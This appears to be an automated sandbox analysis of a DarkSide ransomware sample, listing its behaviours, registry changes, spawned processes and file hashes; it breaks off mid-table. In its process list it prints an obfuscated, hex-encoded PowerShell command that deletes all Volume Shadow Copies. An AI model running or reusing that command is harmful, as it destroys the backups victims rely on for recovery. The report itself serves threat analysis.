Analysis Overview
SHA256
2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
Threat Level: Known bad
The file mal.exe was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Enumerates system info in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Modifies Control Panel
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-25 23:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-25 23:22
Reported
2022-01-25 23:27
Platform
win7-en-20211208
Max time kernel
189s
Max time network
194s
Command Line
Signatures
DarkSide
Reads user/profile data of web browsers
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mal.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mal.exe
"C:\Users\Admin\AppData\Local\Temp\mal.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeeaf4f50,0x7feeeaf4f60,0x7feeeaf4f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1048 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1356 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1696 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2368 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3852 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3800 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=764 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3220 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2076 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2516 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=792 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
Network
Files
memory/968-54-0x0000000000400000-0x000000000083B000-memory.dmp
memory/968-55-0x00000000002F0000-0x0000000000314000-memory.dmp
memory/968-56-0x0000000000020000-0x0000000000030000-memory.dmp
memory/968-57-0x00000000754B1000-0x00000000754B3000-memory.dmp
memory/968-58-0x0000000000400000-0x000000000083B000-memory.dmp
memory/1652-59-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
memory/1652-61-0x0000000002920000-0x0000000002922000-memory.dmp
memory/1652-62-0x0000000002922000-0x0000000002924000-memory.dmp
memory/1652-63-0x0000000002924000-0x0000000002927000-memory.dmp
memory/1652-60-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp
memory/1652-64-0x000000001B770000-0x000000001BA6F000-memory.dmp
memory/1652-65-0x000000000292B000-0x000000000294A000-memory.dmp
\??\pipe\crashpad_1712_BRJFVGIFYYINHDUG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5746a2d4-a368-477c-9a85-6a28ed74cf13.tmp
| MD5 | 068343276d2982c18cbee0c88df9a673 |
| SHA1 | 6ce874c11f1106580fba90d8611894be66de40e6 |
| SHA256 | 9d1b4ab3a16f3f13c52db4fc3440cb181ad5807e4f07e1262d1a992d13bb8a41 |
| SHA512 | be3e17d860cb13babdfe16a8cd9e9983839241c01e48327e969459c871896cdb807df62b07fe892960db5feb8a64e8ea40903e7022b76067fbd9ba7af498b04e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | fe2713936e85049abd4456bf037d5c29 |
| SHA1 | 81ea3f3ebb43d4099e21931522b0cfff51ebb4db |
| SHA256 | 01b16495da4e2fdf784fb84f78214fa96ab058d1e9f9dc1ea66924122f4c2b5c |
| SHA512 | 4fe3bfbd71c92c466182f6a77e078f4085ffe1ee26a3a4f05802ec3b4a92f39ea4ce6f990a555d130ed27ffc53b57b27cd4b7b967c6430252f86205c976e0135 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005
| MD5 | 70ae354ce421c724f886e84c9e5bdbe6 |
| SHA1 | b1d130a83f58a34c86a18881276adb0181da23e7 |
| SHA256 | 3fba20649c9805c920acacf297d0e2863eff51c3992925374d634c94781119ad |
| SHA512 | ce20d7031a8e5d22839903d2fa9d0f357f2fc91d454c2be1878f461654d3b1623247affd8c29a44d6b6290b98e3933cf2e5b683ff473c38a605cad5281801b22 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004
| MD5 | c4a85e28db8384c144974acbf425787a |
| SHA1 | c9e5832f263da2f28827e6db70383e976393952d |
| SHA256 | 0efd753008c76eb6ba7206b014cfeb2cc5dc2ea7d134fcd7045ab59f03a34151 |
| SHA512 | 1a1324ff492b1808573ad0a2c4663aae461dcaefe71e80a2d190c19317701a2f3a611493d4342a50ce1e42c37e48a44465eb18294e753d32fac30df2141bce3f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003
| MD5 | a2a02d1cc5362a1ea22cdd844384b707 |
| SHA1 | 53eb1b1402f6590a05b0049b34a5afe2eb5aae11 |
| SHA256 | 32bf1d779592481ca405b57529b1e5ae5ea2c3ff427d4a54238ca489b6005b72 |
| SHA512 | 96ab950c3555f1c837572d9082315c40f0281a4e54a7a478073ba7142de6e0dd58477c08ece3b1b56fa2ad39482e3dac8f7bce72e1a0a93b05eec86e5356dfda |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002
| MD5 | 8e6367806dd66a70cb1dccfbfa959d93 |
| SHA1 | 74757af565f685d7ce813bb0601b0e0c69465a7b |
| SHA256 | 97dcb049ad634d583b9f3a5bf8a9528b5e9b73ec00fe3dde65e544a7c5885249 |
| SHA512 | 7024562ae7d105bc54cacec51ccc1fb7f54e300ad9290e4114084ccec8d6978b986f7d66acb95614154bd1fa314372c25df4bf2fb29048f2f9aaaa1610a6eb68 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
| MD5 | 22bf0e81636b1b45051b138f48b3d148 |
| SHA1 | 56755d203579ab356e5620ce7e85519ad69d614a |
| SHA256 | e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97 |
| SHA512 | a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
| MD5 | 9a8e0fb6cf4941534771c38bb54a76be |
| SHA1 | 92d45ac2cc921f6733e68b454dc171426ec43c1c |
| SHA256 | 9ee9211a57c3f6fa211fe0323fa8cd521e7cbffcd8ff0896645a45795dc472be |
| SHA512 | 12ed22537dcc79d53f6c7d39e92a38f8fea076d793198928f5b7a5dd1234d50a3c0b4815632f3fadf8bc4ef0499773d22bd83f961d2d0ffd8afacf471bd3a5ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
| MD5 | 9da04288eaee7f27f19509adab997810 |
| SHA1 | f6ecd2dacd5283e436d91dc2f5114b110a7b2e1e |
| SHA256 | 30684ee7baee4e2c22de3c5d62c8469606ad9088269ca96d6d44ee056ea6d5bd |
| SHA512 | 7e64b31db28c7caf18e4fb9f0d8698851936584fb78db02a92199faeee36120eb43570f16b7912a2de2749456d4cbeaedc3680fdaeeaa09e5d1bc7b15e11b0fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal
| MD5 | 7cb0dccfef4d130ce7d47a749d054dc4 |
| SHA1 | 4f664de80dc5f4f65fc286bdc75964e11bbefe49 |
| SHA256 | 804b0dc09f381e21f0441925fd6987944d77ac78e8a922649b4cd2f71ff58355 |
| SHA512 | b037427a5decb092db2d3f8b55d67e9c751d48dba822d729a2ebf0b7bb2a8a76c60b6093a4399b7e9452baa2c38031671e445075f384832044d2e8cfcb1d8d90 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 0eb80653c1f50a5416b4c34a66dd7287 |
| SHA1 | 324f78cb5e36f3fe83dd751380552e9b1aabc2cd |
| SHA256 | 4371a3b88885f0377c44f86aefaef639952394823d574838d72cdf4845e1014d |
| SHA512 | 24fd378028da51b2eb6dc9fc5f925916d5e0fc2bee45ca2488bc1c76b9617836bc4bb1df0fa7c411e5c086ee9ce935c94a9448b3fc6474d5cd7afafe574f4aa2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
| MD5 | 4e6b9fb40c519dfb5ad09840080776e3 |
| SHA1 | db5a428cfda4864128678ac31fa64d19267807ce |
| SHA256 | 07a83533cb26ce9d769df0c669b7a13ca1fec4fdbbc4f144a883f6e5f250db16 |
| SHA512 | 7b837a25c34e476655697ca20e474cbaa86847035234eee5f38074cea74763d08d8bdb603984e1857537cae51149e4203db6911fa35819db623852aebc5fbaa7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 773f2fcd5b74a35cbb85ef5f308e5e58 |
| SHA1 | 20f82e79668c02efc12b21bbb2a1a7bf7c74b8e3 |
| SHA256 | cb47593c0dbf43149dd468e07547d96ef4a72862010906f41a86aa4b985270b1 |
| SHA512 | 4a8800076ed00ef2f172355cab1f90efd86bbbc9e2f1cd402940b2066ca5e7cec6acf2da60c38baa7bf039da3b0bb29a01553838d3e142cc34dfb66578c2642b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 824b0ec1a4aef15d2a357de90b404fcd |
| SHA1 | 906ad4d42f6cd892da7ffc75d01fb1abc276ac81 |
